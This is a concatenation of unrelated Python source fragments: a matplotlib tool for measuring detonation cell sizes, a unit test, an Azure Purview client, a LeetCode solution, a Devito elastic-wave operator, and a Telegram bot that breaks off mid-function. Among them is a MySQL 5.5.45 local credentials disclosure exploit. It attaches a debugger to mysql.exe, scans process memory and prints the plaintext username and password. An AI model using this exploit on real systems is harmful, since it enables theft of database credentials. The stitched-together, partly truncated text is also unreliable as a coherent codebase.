    # don't have time to figure out how, so I'm going to skip it for now.
    # modified version of code from
    # https://stackoverflow.com/questions/34855074/interactive-line-in-matplotlib
    def __init__(self, line, epsilon=10):
        # `line` is a matplotlib Line2D already added to an axes. `epsilon`
        # is used both as the endpoint handle radius and the pick distance.
        canvas = line.figure.canvas
        line.set_alpha(0.7)
        self.canvas = canvas
        self.canvas.mpl_connect("key_press_event", self._button)
        self.line = line
        self.axes = line.axes
        self.xs = list(line.get_xdata())
        self.ys = list(line.get_ydata())
        self.background = None
        self.epsilon = epsilon
        # One circular drag handle per line endpoint.
        self.circles = [
            widgets.Circle(
                (self.xs[i], self.ys[i]),
                epsilon,
                color=line.get_c(),
                lw=line.get_linewidth(),
                fill=False,
                alpha=0.25
            )
            for i in range(len(self.xs))
        ]
        for c in self.circles:
            self.axes.add_artist(c)
        # End lines are long enough to span the axes diagonal twice, so
        # they always cross the full visible area.
        self._end_line_length = 2 * np.sqrt(
            sum([
                np.diff(self.axes.get_xlim())**2,
                np.diff(self.axes.get_ylim())**2
            ])
        )
        self._end_lines = [
            widgets.Line2D(
                [0, 1],
                [0, 1],
                c=line.get_c(),
                lw=line.get_linewidth(),
                alpha=0.5*line.get_alpha()
            )
            for _ in self.xs
        ]
        self.set_end_lines()
        for _line in self._end_lines:
            self.axes.add_artist(_line)
        # All artists that get redrawn during a drag (blitting).
        self.items = (self.line, *self.circles, *self._end_lines)
        self.ind = None
        canvas.mpl_connect('button_press_event', self.button_press_callback)
        canvas.mpl_connect('button_release_event', self.button_release_callback)
        canvas.mpl_connect('motion_notify_event', self.motion_notify_callback)

    def _button(self, event):
        # Pressing enter accepts the current line placement.
        if event.key == "enter":
            plt.close(self.line.figure)

    def get_ind(self, event):
        # Return the index (0 or 1) of the endpoint nearest the click, or
        # None when the click is farther than epsilon from both endpoints
        # (or outside the axes, via the implicit None return).
        if event.inaxes is not None:
            x = np.array(self.line.get_xdata())
            y = np.array(self.line.get_ydata())
            d = np.sqrt((x-event.xdata)**2 + (y - event.ydata)**2)
            if min(d) > self.epsilon:
                return None
            return int(d[0] > d[1])

    def button_press_callback(self, event):
        if event.button == 2:
            # middle click closes the figure
            plt.close(self.axes.get_figure())
        elif event.button != 1:
            return
        self.ind = self.get_ind(event)
        # Switch to blitting: cache the static background once, then only
        # redraw the interactive artists while dragging.
        for item in self.items:
            item.set_animated(True)
        self.canvas.draw()
        self.background = self.canvas.copy_from_bbox(self.line.axes.bbox)
        for item in self.items:
            self.axes.draw_artist(item)
        self.canvas.blit(self.axes.bbox)

    def button_release_callback(self, event):
        # End of a drag: drop the blitting state and do a full redraw.
        if event.button != 1:
            return
        self.ind = None
        for item in self.items:
            item.set_animated(False)
        self.background = None
        for item in self.items:
            item.figure.canvas.draw()

    def motion_notify_callback(self, event):
        # Drag handler: move the grabbed endpoint and redraw via blitting.
        if event.inaxes != self.line.axes:
            return
        if event.button != 1:
            return
        if self.ind is None:
            return
        self.xs[self.ind] = event.xdata
        self.ys[self.ind] = event.ydata
        self.line.set_data(self.xs, self.ys)
        self.set_end_lines()
        for c, x, y in zip(self.circles, self.xs, self.ys):
            # noinspection PyArgumentList
            c.set_center((x, y))
        self.canvas.restore_region(self.background)
        for item in self.items:
            self.axes.draw_artist(item)
        self.canvas.blit(self.axes.bbox)

    def get_line_angle(self):
        # NOTE(review): an exactly vertical line returns pi rather than
        # pi/2; after the +pi/2 offset in calculate_end_line_xy this makes
        # the end lines near-vertical (parallel to the main line) instead
        # of perpendicular -- confirm this edge case is intended.
        if np.diff(self.xs) == 0:
            return np.pi
        else:
            return np.arctan(np.diff(self.ys) / np.diff(self.xs))[0]

    def calculate_end_line_xy(self):
        # End lines are offset perpendicular to the main line; dx/dy are
        # the half-length components along that perpendicular direction.
        angle = (self.get_line_angle() + np.pi / 2) % (2 * np.pi)
        dx = self._end_line_length / 2 * np.sqrt(1 / (1 + np.tan(angle)**2))
        dy = dx * np.tan(angle)
        x_points = [list(x + np.array([1, -1]) * dx) for x in self.xs]
        y_points = [list(y + np.array([1, -1]) * dy) for y in self.ys]
        return [x_points, y_points]

    def set_end_lines(self):
        # Recompute and apply the two end-line segments.
        end_line_points = self.calculate_end_line_xy()
        for _line, x, y in zip(self._end_lines, *end_line_points):
            _line.set_data(x, y)
class MeasurementCollector(object):  # pragma: no cover
    # also skipping tests for the same reason as LineBuilder
    class RemoveLine:
        # Sentinel "event" carrying a right-click button code.
        button = 3

    class CloseIt:
        # Sentinel "event" carrying a middle-click button code.
        button = 2

    def __init__(self, image, lc="r"):
        # locs: measured y locations; lines: matching axhline artists.
        self.locs = []
        self.cmap = "gray"
        fig, [ax, ax2] = plt.subplots(2, 1)
        self.lines = []
        self.fig = fig
        plt.get_current_fig_manager().window.setGeometry(0, 0, 640, 480)
        self.ax = ax
        self.lc = lc
        # remove_annotations(ax)
        ax.set_axis_off()
        # Main image on top; small axes below hosts the reset button.
        ax.set_position([0, 0.07, 1, 0.9])
        ax2.set_position([0.375, 0.01, 0.25, 0.05])
        # plt.axis("off")
        # plt.axis("tight")
        self._help = False
        self._title_default = "press 'h' for help"
        self._title_help = \
            "HELP MENU\n\n"\
            "press 'r' to invert colors\n"\
            "press left mouse to identify a triple point\n"\
            "press right mouse to delete last measurement\n"\
            "press 'enter' or center mouse to end measurements\n"\
            "click and drag horizontally to adjust contrast to red area\n"\
            "click 'Reset Contrast' button to reset contrast\n"\
            "press 'h' to hide this dialog"
        self._set_title(self._title_default)
        canvas = ax.figure.canvas
        canvas.mpl_connect("key_press_event", self._button)
        canvas.mpl_connect('button_release_event', self.button_press_callback)
        self.image = self._sharpen(image)
        # Horizontal drag selects the x-range used for contrast adjustment.
        self.rect_select = widgets.SpanSelector(
            self.ax,
            self.slider_select,
            "horizontal"
        )
        # noinspection PyTypeChecker
        # ax2 = plt.axes((0.375, 0.025, 0.25, 0.04))
        # fig.add_axes(ax2)
        self.btn_reset = widgets.Button(
            ax2,
            "Reset Contrast"
        )
        self.btn_reset.on_clicked(self.reset_vlim)
        self.ax.imshow(self.image, cmap=self.cmap)
        self.fig.canvas.draw()

    @staticmethod
    def _sharpen(image):
        # Normalize to [0, 1] and darken vertical edges (sobel_v) to make
        # features stand out. Note: scales the input array in place.
        image /= image.max()
        filtered = 1 - sobel_v(image)
        filtered /= filtered.max()
        return filtered * image

    def _button(self, event):
        # Keyboard shortcuts: enter = finish, r = invert colormap, h = help.
        if event.key == "enter":
            self.button_press_callback(self.CloseIt)
        elif event.key == "r":
            if self.cmap == "gray":
                self.cmap = "gist_gray_r"
            else:
                self.cmap = "gray"
            self.ax.images[0].set_cmap(self.cmap)
            self.fig.canvas.draw()
        elif event.key == "h":
            # NOTE(review): the flag is toggled after use, so the first 'h'
            # press re-shows the default title and help appears on the
            # second press -- confirm this ordering is intended.
            if self._help:
                self._set_title(self._title_help, True)
            else:
                self._set_title(self._title_default)
            self._help = not self._help
            self.fig.canvas.draw()

    def _set_title(self, string, have_background=False):
        # Help text gets a translucent white background; the default title
        # is drawn without one.
        if have_background:
            bg_color = (1, 1, 1, 0.75)
            h_align = "left"
        else:
            bg_color = (0, 0, 0, 0)
            h_align = "right"
        t = self.fig.suptitle(
            string,
            size=10,
            y=0.99,
            ma=h_align,
        )
        t.set_backgroundcolor(bg_color)
        self.fig.canvas.draw()

    def slider_select(self, x_min, x_max):
        # SpanSelector callback: rescale display contrast to the dragged
        # x-range; a <=1 px drag is treated as an accidental click.
        px_distance = abs(x_max - x_min)
        if px_distance <= 1:
            # this should have been a click
            pass
        else:
            # this was meant to be a drag
            x_min, x_max = int(x_min), int(x_max)
            img_in_range = self.image[:, x_min:x_max]
            self.ax.images[0].norm.vmin = np.min(img_in_range)
            self.ax.images[0].norm.vmax = np.max(img_in_range)
            self.fig.canvas.draw()
            # discard the measurement line the drag's click created
            self.button_press_callback(self.RemoveLine)

    def reset_vlim(self, _):
        # Button callback: restore contrast to the full image range.
        self.ax.images[0].norm.vmin = np.min(self.image)
        self.ax.images[0].norm.vmax = np.max(self.image)
        self.button_press_callback(self.RemoveLine)
        self.fig.canvas.draw()

    def button_press_callback(self, event):
        if event.button == 1:
            # left click: record a measurement at the clicked y location
            if any([d is None for d in [event.xdata, event.ydata]]):
                # ignore clicks outside of image
                pass
            else:
                self.lines.append(self.ax.axhline(event.ydata, color=self.lc))
                self.locs.append(event.ydata)
                self.fig.canvas.draw()
        elif event.button == 2:
            # middle click: finish measuring
            plt.close()
        elif event.button == 3:
            # right click: undo the most recent measurement
            if self.lines:
                # noinspection PyProtectedMember
                self.lines[-1]._visible = False
                del self.lines[-1], self.locs[-1]
                self.fig.canvas.draw()

    def get_data(self):
        # Block until the figure is closed, then return the sorted y
        # locations with pixel uncertainty attached.
        plt.show(block=True)
        points = unp.uarray(
            sorted(np.array(self.locs)),
            add_uncertainty_terms([
                u_cell["delta_px"]["b"],
                u_cell["delta_px"]["p"]
            ])
        )
        return points
def get_cell_size_from_delta(
        delta,
        l_px_i,
        l_mm_i
):
    """
    Converts pixel triple point deltas to cell size

    Parameters
    ----------
    delta : un.ufloat
        Triple point delta in pixels
    l_px_i : float
        nominal value of spatial calibration factor (px)
    l_mm_i : float
        nominal value of spatial calibration factor (mm)

    Returns
    -------
    un.ufloat
        estimated cell size
    """
    length_px = un.ufloat(
        l_px_i,
        add_uncertainty_terms([
            u_cell["l_px"]["b"],
            u_cell["l_px"]["p"]
        ])
    )
    length_mm = un.ufloat(
        l_mm_i,
        add_uncertainty_terms([
            u_cell["l_mm"]["b"],
            u_cell["l_mm"]["p"]
        ])
    )
    # Cell size is twice the measured delta, converted px -> mm.
    return 2 * delta * length_mm / length_px
def _filter_df_day_shot(
df,
day_shot_list,
return_mask=False
):
"""
Filters a dataframe by date and shot number for an arbitrary number of
date/shot combinations. Returns the indices (for masking) and the filtered
dataframe.
Parameters
----------
df : pd.DataFrame
dataframe to filter. Must have columns for "date" and "shot".
day_shot_list : List[Tuple[Str, Int, Int]]
List of tuples containing date, start shot, and end shot. Date should
be a string in ISO-8601 format, and start/end shots numbers should be
integers:
[("YYYY-MM-DD", start_shot, end_shot)]
return_mask : bool
if true, mask will be returned as the second item, which can be used to
update data (e.g. inserting a spatial calibration)
Returns
-------
Union[Tuple[pd.DataFrame, np.array], Tuple[pd.DataFrame]]
(filtered dataframe,) or (filtered dataframe, mask)
"""
mask_list = [((df["date"] == date) &
(df["shot"] <= end_shot) &
(df["shot"] >= start_shot))
for (date, start_shot, end_shot) in day_shot_list]
mask = [False for _ in range(len(df))]
for m in mask_list:
mask = m | mask
if return_mask:
return df[mask], mask
else:
return df[mask],
def _check_stored_calibrations(
df
):
"""
Check for stored calibrations within a filtered dataframe. All rows are
checked for:
* whether there are any stored spatial calibrations
* whether there are stored calibrations for every date and shot
* whether all of the stored calibrations are equal
This function is meant to be applied to a schlieren dataframe, which must
contain the columns:
* spatial_near
* spatial_far
* spatial_centerline
Parameters
----------
df : pd.DataFrame
filtered dataframe containing only the date/shot combinations of
interest
Returns
-------
Dict[String: Dict[String: Bool]]
Outer keys:
* near
* far
* centerline
Inner keys:
* any
* all
* equal
"""
out = dict(
near=dict(
any=False,
all=False,
equal=False,
),
far=dict(
any=False,
all=False,
equal=False,
),
centerline=dict(
any=False,
all=False,
equal=False,
),
)
for location in out.keys():
values = df["spatial_" + location].values.astype(float)
not_nan = ~np.isnan(values)
out[location]["any"] = np.any(not_nan)
out[location]["all"] = np.all(not_nan)
if len(values[not_nan]) == 0:
# everything is NaN
out[location]["equal"] = True
else:
# allclose will cause nanmedian check to fail for NaN as well as
# for differing numerical values
out[location]["equal"] = np.allclose(
values,
np.nanmedian(values)
)
return out
class SpatialCalibration:
    """Collects interactive spatial calibrations and stores them in the
    schlieren measurement HDF store."""

    @staticmethod
    def collect(
            date,
            loc_processed_data,
            loc_schlieren_measurements,
            raise_if_no_measurements=True
    ):
        # Collect near/far calibrations for every spatial directory used on
        # `date` and write them into the schlieren measurement store.
        # loc_processed_data / loc_schlieren_measurements are paths to HDF
        # stores that each contain a "data" dataframe.
        with pd.HDFStore(loc_processed_data, "r") as store_pp:
            # make sure date is in post-processed data
            if date not in store_pp.data["date"].unique():
                e_str = "date {:s} not in {:s}".format(
                    date,
                    loc_processed_data
                )
                raise ValueError(e_str)
            else:
                # map each shot on this date to its spatial directory
                df_dirs = store_pp.data[
                    store_pp.data["date"] == date
                ][["shot", "spatial"]]
                df_dirs.columns = ["shot", "dir"]
                df_dirs["dir"] = df_dirs["dir"].apply(
                    convert_dir_to_local
                )
        with pd.HDFStore(loc_schlieren_measurements, "r+") as store_sc:
            df_sc = store_sc.data[
                store_sc.data["date"] == date
            ]
            if len(df_sc) == 0 and raise_if_no_measurements:
                e_str = "no measurements found for %s" % date
                raise ValueError(e_str)

            # collect calibrations -- one (near, far) pair per distinct
            # spatial directory, measured interactively when the .tif exists
            df_daily_cal = pd.DataFrame([dict(
                dir=k,
                near=un.ufloat(np.NaN, np.NaN),
                far=un.ufloat(np.NaN, np.NaN),
            ) for k in df_dirs["dir"].unique()]).set_index("dir")
            desired_cals = ["near", "far"]
            successful_cals = []
            for d, row in df_daily_cal.iterrows():
                for which in desired_cals:
                    pth_tif = os.path.join(str(d), which + ".tif")
                    if os.path.exists(pth_tif):
                        df_daily_cal.at[
                            d,
                            which
                        ] = collect_spatial_calibration(pth_tif)
                        successful_cals.append(which)

            # apply calibrations to the rows of each shot
            for _, row in df_dirs.iterrows():
                row_mask = df_sc["shot"] == row["shot"]
                # set near and far spatial calibrations
                for which in successful_cals:
                    key = "spatial_" + which
                    df_sc[key] = np.where(
                        row_mask,
                        df_daily_cal.loc[row["dir"], which].nominal_value,
                        df_sc[key]
                    )
                    key = "u_" + key
                    df_sc[key] = np.where(
                        row_mask,
                        df_daily_cal.loc[row["dir"], which].std_dev,
                        df_sc[key]
                    )
                    df_sc["spatial_" + which + "_estimated"] = False
                # calculate and set centerline calibration as the mean of
                # the near and far calibrations (with uncertainties)
                # NOTE(review): computed per-shot inside this loop even
                # though it spans all rows -- confirm intended.
                centerline = np.mean(
                    [unp.uarray(df_sc["spatial_near"], df_sc["u_spatial_near"]),
                     unp.uarray(df_sc["spatial_far"], df_sc["u_spatial_far"])],
                    axis=0
                )
                df_sc["spatial_centerline"] = np.where(
                    row_mask,
                    unp.nominal_values(centerline),
                    df_sc["spatial_centerline"]
                )
                df_sc["u_spatial_centerline"] = np.where(
                    row_mask,
                    unp.std_devs(centerline),
                    df_sc["u_spatial_centerline"]
                )

            # write the updated rows for this date back to the store
            df_out = store_sc.data
            df_out.loc[df_out["date"] == date] = df_sc
            store_sc.put("data", df_out)
|
# Copyright (c) 2021 Princeton University
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import sys
import unittest

# Make the workload-invoker package importable when running from this dir.
sys.path.insert(1, '../..')

from synthetic_workload_invoker.EventGenerator import *
class TestEventGenerator(unittest.TestCase):
    """Unit tests for the inter-arrival time helpers in EventGenerator."""

    def test_CreateEvents(self):
        # A uniform rate of 1 event/s over 5 s is expected to yield 1.0 s
        # inter-arrival gaps after the initial event.
        inter_arrivals = CreateEvents(instance=0, dist='Uniform', rate=1, duration=5, seed=100)
        self.assertEqual(inter_arrivals[1:], [1.0, 1.0, 1.0, 1.0])

    def test_EnforceActivityWindow(self):
        # Clipping the events implied by these inter-arrivals to the
        # (1.5, 3.5) window is expected to leave gaps of [2.0, 1.0].
        event_iit = EnforceActivityWindow(start_time=1.5, end_time=3.5,
                                          instance_events=[1.0, 1.0, 1.0, 1.0])
        self.assertEqual(event_iit, [2.0, 1.0])
if __name__ == '__main__':
    # Allow running this test module directly with python.
    unittest.main()
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import TYPE_CHECKING
from azure.core import PipelineClient
from azure.purview.catalog.core.rest import HttpResponse, _StreamContextManager
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Dict
from azure.core.credentials import TokenCredential
from azure.purview.catalog.core.rest import HttpRequest
from ._configuration import PurviewCatalogClientConfiguration
class PurviewCatalogClient(object):
    """Purview Catalog Service is a fully managed cloud service whose users can discover the data sources they need and understand the data sources they find. At the same time, Data Catalog helps organizations get more value from their existing investments. This spec defines REST API of Purview Catalog Service.

    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials.TokenCredential
    :param endpoint: The catalog endpoint of your Purview account. Example: https://{accountName}.catalog.purview.azure.com.
    :type endpoint: str
    """

    def __init__(
        self,
        credential, # type: "TokenCredential"
        endpoint, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> None
        # '{Endpoint}' stays a placeholder here; it is resolved per request in
        # send_request() via format_url().
        self._config = PurviewCatalogClientConfiguration(credential, endpoint, **kwargs)
        self._client = PipelineClient(base_url='{Endpoint}/api', config=self._config, **kwargs)
        serializer = Serializer()
        serializer.client_side_validation = False
        self._serialize = serializer
        self._deserialize = Deserializer()

    def send_request(self, http_request, **kwargs):
        # type: (HttpRequest, Any) -> HttpResponse
        """Runs the network request through the client's chained policies.

        Helper methods in `azure.purview.catalog.rest` build requests specific to this
        service; pass the built request to this method. Example:

        >>> from azure.purview.catalog.rest import build_create_or_update_request
        >>> request = build_create_or_update_request(json, content)
        <HttpRequest [POST], url: '/atlas/v2/entity'>
        >>> response = client.send_request(request)
        <HttpResponse: 200 OK>

        For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart
        For advanced cases you can also create your own
        :class:`~azure.purview.catalog.core.rest.HttpRequest` and pass it in.

        :param http_request: The network request you want to make. Required.
        :type http_request: ~azure.purview.catalog.core.rest.HttpRequest
        :keyword bool stream_response: Whether the response payload will be streamed. Defaults to False.
        :return: The response of your network call. Does not do error handling on your response.
        :rtype: ~azure.purview.catalog.core.rest.HttpResponse
        """
        # Work on a copy so the caller's request object is never mutated.
        request_copy = deepcopy(http_request)
        url_arguments = {
            'Endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
        }
        request_copy.url = self._client.format_url(request_copy.url, **url_arguments)

        wants_stream = kwargs.pop("stream_response", False)
        if wants_stream:
            return _StreamContextManager(
                client=self._client._pipeline,
                request=request_copy,
            )
        pipeline_response = self._client._pipeline.run(request_copy._internal_request, **kwargs)
        response = HttpResponse(
            status_code=pipeline_response.http_response.status_code,
            request=request_copy,
            _internal_response=pipeline_response.http_response,
        )
        # Load the body into memory before handing the response back.
        response.read()
        return response

    def close(self):
        # type: () -> None
        self._client.close()

    def __enter__(self):
        # type: () -> PurviewCatalogClient
        self._client.__enter__()
        return self

    def __exit__(self, *exc_details):
        # type: (Any) -> None
        self._client.__exit__(*exc_details)
|
class Solution:
def canPlaceFlowers(self, pos, n):
pos = [0] + pos + [0]
for i in range(1, len(pos)-1):
if n == 0: return True
if not (pos[i] or pos[i-1] or pos[i+1]):
pos[i] = 1
n -= 1
return n == 0
|
from devito import Eq, Operator, TimeFunction, left, right, staggered_diff
from examples.seismic import PointSource, Receiver
def ForwardOperator(model, source, receiver, space_order=4,
                    save=False, **kwargs):
    """
    Constructor method for the forward modelling operator in an elastic media.

    Implements a first-order velocity-stress formulation: particle velocities
    (vx, vz) and stress components (txx, tzz, txz) are updated alternately on
    a staggered grid. `damp` multiplies every update (presumably the
    absorbing-boundary mask — confirm against Model).

    :param model: :class:`Model` object containing the physical parameters
    :param source: :class:`PointData` object containing the source geometry
    :param receiver: :class:`PointData` object containing the acquisition geometry
    :param space_order: Space discretization order
    :param save: Saving flag, True saves all time steps, False only the three buffered
                 indices (last three time steps)
    :returns: a devito :class:`Operator` implementing the forward elastic update
    """
    vp, vs, rho, damp = model.vp, model.vs, model.rho, model.damp
    s = model.grid.stepping_dim.spacing
    x, z = model.grid.dimensions
    # Derived material fields: squared velocities, buoyancy, Lame parameters
    # (mu = shear modulus, l = first Lame parameter).
    cp2 = vp*vp
    cs2 = vs*vs
    ro = 1/rho
    mu = cs2*rho
    l = rho*(cp2 - 2*cs2)
    # Create symbols for forward wavefield, source and receivers
    vx = TimeFunction(name='vx', grid=model.grid, staggered=(0, 1, 0),
                      save=source.nt if save else None,
                      time_order=2, space_order=space_order)
    vz = TimeFunction(name='vz', grid=model.grid, staggered=(0, 0, 1),
                      save=source.nt if save else None,
                      time_order=2, space_order=space_order)
    txx = TimeFunction(name='txx', grid=model.grid,
                       save=source.nt if save else None,
                       time_order=2, space_order=space_order)
    tzz = TimeFunction(name='tzz', grid=model.grid,
                       save=source.nt if save else None,
                       time_order=2, space_order=space_order)
    txz = TimeFunction(name='txz', grid=model.grid, staggered=(0, 1, 1),
                      save=source.nt if save else None,
                      time_order=2, space_order=space_order)
    # Source symbol with input wavelet
    src = PointSource(name='src', grid=model.grid, time_range=source.time_range,
                      npoint=source.npoint)
    rec1 = Receiver(name='rec1', grid=model.grid, time_range=receiver.time_range,
                    npoint=receiver.npoint)
    rec2 = Receiver(name='rec2', grid=model.grid, time_range=receiver.time_range,
                    npoint=receiver.npoint)
    # Stencils: velocity updates from stress divergence ...
    fd_vx = (staggered_diff(txx, dim=x, order=space_order, stagger=left) +
             staggered_diff(txz, dim=z, order=space_order, stagger=right))
    u_vx = Eq(vx.forward, damp * vx - damp * s * ro * fd_vx)
    fd_vz = (staggered_diff(txz, dim=x, order=space_order, stagger=right) +
             staggered_diff(tzz, dim=z, order=space_order, stagger=left))
    u_vz = Eq(vz.forward, damp * vz - damp * ro * s * fd_vz)
    # ... then stress updates from the freshly advanced velocities (leap-frog).
    vxdx = staggered_diff(vx.forward, dim=x, order=space_order, stagger=right)
    vzdz = staggered_diff(vz.forward, dim=z, order=space_order, stagger=right)
    u_txx = Eq(txx.forward, damp * txx - damp * (l + 2 * mu) * s * vxdx
                                       - damp * l * s * vzdz)
    u_tzz = Eq(tzz.forward, damp * tzz - damp * (l+2*mu)*s * vzdz
                                       - damp * l * s * vxdx)
    vxdz = staggered_diff(vx.forward, dim=z, order=space_order, stagger=left)
    vzdx = staggered_diff(vz.forward, dim=x, order=space_order, stagger=left)
    u_txz = Eq(txz.forward, damp * txz - damp * mu*s * (vxdz + vzdx))
    # The source injection term (injected into both normal stresses)
    src_xx = src.inject(field=txx.forward, expr=src * s, offset=model.nbpml)
    src_zz = src.inject(field=tzz.forward, expr=src * s, offset=model.nbpml)
    # Create interpolation expression for receivers (txx and tzz records)
    rec_term1 = rec1.interpolate(expr=txx, offset=model.nbpml)
    rec_term2 = rec2.interpolate(expr=tzz, offset=model.nbpml)
    # Substitute spacing terms to reduce flops
    return Operator([u_vx, u_vz, u_txx, u_tzz, u_txz] + src_xx + src_zz
                    + rec_term1 + rec_term2, subs=model.spacing_map,
                    name='Forward', **kwargs)
|
#####
# MySQL 5.5.45 (64bit) Local Credentials Disclosure
# Tested on Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.mysql.com
# Date 05/09/2016
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
#
# http://www.black-rose.ml
# Source Code for the executable attached
# Special Thanks & Greetings to Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#####
# MySQL v5.5.45 is vulnerable to local credentials disclosure: the supplied username and password are stored in plaintext in the process memory.
# A potential attacker could reveal the supplied username and password in order to gain access to the database.
# Proof-Of-Concept Code:
#####
import time
from winappdbg import Debug, Process
def b2h(data):
    """Render a character string as space-separated uppercase hex pairs.

    e.g. 'AB' -> '41 42'. Inverse of h2b().
    """
    # Parameter renamed from `str`, which shadowed the builtin.
    return ' '.join('%02X' % ord(ch) for ch in data)
def h2b(hex_text):
    """Decode space-separated hex pairs back into a character string.

    e.g. '41 42' -> 'AB'. Inverse of b2h().
    """
    # Parameter renamed from `str` and local from `bytes` — both shadowed builtins.
    compact = ''.join(hex_text.split(' '))
    return ''.join(chr(int(compact[i:i + 2], 16)) for i in range(0, len(compact), 2))
# --- PoC entry point (Python 2 only: print statements, winappdbg) ---
usr = ''
pwd = ''
count = 0
filename = "mysql.exe"
process_pid = 0
memory_dump = []
passwd = []
debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    # Keep the pid of the last matching process (if several are running).
    for (process, process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    # NOTE(review): `is not 0` is an identity test that only works because
    # CPython caches small ints; `!= 0` is what is meant here.
    if process_pid is not 0:
        print "[+] Found process pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)
        process = Process(process_pid)
        # The byte pattern is "\0mysql\0-u\0": the argv area preceding the
        # username passed with -u on the command line.
        for address in process.search_bytes('\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
            memory_dump.append(process.read(address,30))
        for i in range(len(memory_dump)):
            # NOTE(review): `str` shadows the builtin throughout this loop.
            str = b2h(memory_dump[i])
            # Username sits between the "-u\0" marker and the following " -p".
            first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
            last = first.split(" 00 2D 70")
            if last[0]:
                usr = h2b(last[0])
        memory_dump = []
        # Second scan: region that precedes the stored password.
        for address in process.search_bytes('\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            memory_dump.append(process.read(address,100))
        # NOTE(review): return value of sorted() is discarded — has no effect.
        sorted(set(memory_dump))
        for i in range(len(memory_dump)):
            str = b2h(memory_dump[i])
            string = str.split('00 8F')
            for x in range(len(string)):
                if x == 1:
                    passwd = string
        try:
            # Password is the hex run up to the first '00 00' terminator.
            pwd = h2b(passwd[1].split('00 00')[0])
        except:
            pass
        print "[~] Trying to extract credentials from memory.."
        time.sleep(1)
        if usr != '' and pwd != '':
            print "[+] Credentials found!\r\n----------------------------------------"
            print "[+] Username: %s" % usr
            print "[+] Password: %s" % pwd
        else:
            print "[-] Credentials not found!"
    else:
        print "[-] No process found with name '%s'" % (filename)
    debug.loop()
finally:
    # Always detach the debugger, even on error.
    debug.stop()
|
import os
import re
import sys
import json
import socket
import sqlite3
import logging
import datetime
import telegram
from time import sleep
from src.chrono import Chrono
from src.command import Task
from src.command import Command
from src.utils import get_api_token
from src.simple_parser import Parser
from telegram.error import NetworkError, Unauthorized
api_token = ''
# Fall back to the token stored on disk when none is hard-coded above.
if not api_token: api_token = get_api_token()
#########
# SETUP #
#########
logging.basicConfig(level=logging.WARNING, format='%(asctime)s %(levelname)s [%(module)s]: %(message)s')
logger = logging.getLogger(__name__)
logger.addHandler(logging.FileHandler('log.log', 'w', 'utf-8'))
# Offset of the next Telegram update to fetch (None = start from the oldest).
update_id = None
# Module-wide sqlite connection/cursor shared by every db_* helper below.
conn = sqlite3.connect('database.db')
c = conn.cursor()
parser = Parser()
chrono = Chrono()
# NOTE(review): the next two names are not referenced in this file — presumably
# used by the parser or kept for future commands; confirm before removing.
valid_undo_commands = ['ADD', 'DEL', 'APPEND', 'EDIT', 'ADD_RECUR', 'DEL_RECUR']
recurring_list_commands = ['LIST_RECUR', 'DEL_RECUR']
weekday_integer_list = {'mon':1, 'tue':2, 'wed':3, 'thu':4, 'fri':5, 'sat':6, 'sun':7}
# Maximum tasks rendered before the list is trimmed behind a /show_all link.
TASK_NUMBER_LIMIT = 20
# User-facing message templates (Telegram HTML formatting).
INVALID_COMMAND_MULTI = 'Whoops! You can only use multiple lines for the "<b>ADD</b>" command. The "<b>{}</b>" command is not allowed in conjunction with other commands.'
INVALID_COMMAND_MYTIME = 'Not enough information to calculate your timezone!'
INVALID_COMMAND_GENERAL = 'Invalid Command Haha! See /help.'
INVALID_COMMAND_INDEX = 'Task {} is out of list range!'
INVALID_COMMAND_APPEND = 'Nothing to append!'
INVALID_COMMAND_UNDO = 'No more undos!'
NOTIFICATION_DEL = '<b>(Deleted!)</b> {}'
NOTIFICATION_MYTIME = 'Your timezone has been calculated and stored!'
# Commands that need no database mutation before the list is rendered.
COMMAND_LIST_PASS = ['LIST', 'START', 'LIST_FULL', 'LIST_RECUR', 'HELP']
##################
# MAIN FUNCTIONS #
##################
def main():
    """Bootstrap the bot and database, then poll Telegram forever.

    Transient errors are logged and retried after a short sleep so the
    polling loop never dies.
    """
    global update_id
    logger.warning('(1/3) Loading bot...')
    bot = get_bot(api_token)
    update_id = get_update_id(bot)
    logger.warning('(2/3) Loading database...')
    db_init()
    logger.warning('(3/3) Bot ready.')
    #send('Recipebot has been activated.', 302383988, bot)
    while True:
        try:
            handle_updates(bot)
        except NetworkError:
            sleep(1)
        except Unauthorized:
            # Sender is unreachable (likely blocked the bot) — skip the update.
            update_id += 1
        except Exception as e:
            logger.error('Exception {}'.format(str(e)))
            exc_type, exc_obj, exc_tb = sys.exc_info()
            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
            #print(exc_type, fname, exc_tb.tb_lineno)
            sleep(1)
def handle_updates(bot):
    """Fetch pending updates, reply to each message, and advance update_id."""
    global update_id
    for update in bot.get_updates(offset=update_id, timeout=10):
        # Acknowledge this update so it is not delivered again.
        update_id = update.update_id + 1
        if update.message:
            m = update.message
        elif update.edited_message:
            m = update.edited_message
        else:
            # Skip updates that carry no (edited) message payload.
            continue
        logger.info('{}: {}'.format(m.chat_id, m.text))
        reply = get_reply(m.text, m.chat_id)
        logger.info('Reply:{}'.format(reply))
        send(reply, m.chat_id, bot)
def get_reply(text, id):
